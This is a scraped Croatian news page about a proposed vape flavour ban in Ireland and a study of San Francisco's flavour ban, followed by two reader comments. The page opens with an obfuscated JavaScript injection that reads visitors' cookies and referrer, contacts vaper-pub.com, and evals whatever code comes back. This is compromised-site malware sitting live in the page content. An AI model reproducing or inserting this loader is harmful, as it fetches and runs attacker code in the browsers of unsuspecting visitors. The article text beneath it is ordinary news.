;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Zabrana vape aroma u Irskoj mogla bi naštetiti javnom zdravlju

Irski zdravstveni odbor Oireachtas je upozoren da bi zabrana aroma za e-cigarete mogla naštetiti javnom zdravlju.

Na saslušanju Odbora za zdravstvo Oireachtasa u studenom, predsjednik Seán Crowe govorio je u korist zabrane okusa vapea, rekavši da bi to trebalo biti uključeno u nadolazeći Zakon o duhanu i nikotinskim proizvodima za inhaliranje (kao što su e-cigarete).

Međutim, u skladu s argumentima raznih subjekata za smanjenje štete od duhana, zdravstveni odbor sada se upozorava da bi takva zabrana imala štetan učinak na javno zdravlje. Štoviše, Declan Connolly iz Irish Vape Vendors Association (UVVA) ističe da su okusi e-tekućina od “bitne važnosti za vapere”.

“IVVA je duboko zabrinuta negativnim učincima koje bi zabrana okusa mogla imati na smanjenje štete od duhana i izbor potrošača. Istraživanje koje je provela Independent European Vape Alliance (IEVA) 2020. pokazalo je da gotovo 65 posto vapera koristi voćne ili desertne e-tekućine na dnevnoj bazi.”

“Glavni argument u korist zabrane aromatiziranih tekućina za e-cigarete je potencijalni rizik da proizvodi za vaping budu privlačniji maloljetnicima s aromama i pakiranjem prilagođenim djeci. Povezanost između okusa vapinga i kasnijeg početka pušenja nije potkrijepljena dokazima.”

U skladu s Connollyjevim argumentima, dok većina pretpostavlja da su zabrane okusa korisne jer bi smanjile stope pušenja kod tinejdžera, nedavna studija objavljena u časopisu JAMA Pediatrics pokazala je da je nakon zabrane okusa u San Franciscu veća vjerojatnost da će tinejdžeri u gradskim srednjim školama početi pušiti nego tinejdžeri u školskim četvrtima bez takve zabrane.

SB 793

U kolovozu 2020., SB 793 senatora Jerryja Hilla zabranio je prodaju duhanskih proizvoda s okusom, uključujući neduhanske proizvode kao što su e-cigarete, diljem grada San Francisca. Studija pod nazivom “Analiza razlika u razlikama kod pušenja mladih i zabrana prodaje aromatiziranih duhanskih proizvoda u San Franciscu, Kalifornija“, imala je za cilj utvrditi bilo kakvu vezu između zabrane prodaje aromatiziranih duhanskih proizvoda u San Franciscu i pušenja među srednjoškolcima i studentima mlađim od 18 godina.

Istraživači su otkrili daje nakon zabrane kod tinejdžeri u gradskim srednjim školama veća vjerojatnost da će početi pušiti nego tinejdžeri u školskim četvrtima u SAD-u gdje nisu bile uvedene zabrane okusa. Prije ove zabrane su stope pušenja u San Franciscu bile slične onima u mnogim gradovima diljem zemlje, a nakon zabrane je broj pušača počeo postepeno rasti.

Choose your Reaction!
  • Ma, ovo su sve fore. Pod krinkom brige o mladima duhanski lobby udara po Vapeu gdjegod i kako god stigne.
    Jbt, Vape im je trn u oku a cigarete se uredno prodaju. Što onda ne zabrane potpuno cigarete ako je Vape
    toliko štetan, kad znamo da je zasigurno manje štetan od cigareta.
    Hoće, malo morgen. Ipak se tu vrti ogromna lova.

  • I eto opet, glavni argument “djeca, maloljetnici…” – pa da baš ništa novo ne mogu izmisliti… nevjerojatno…

Leave a Comment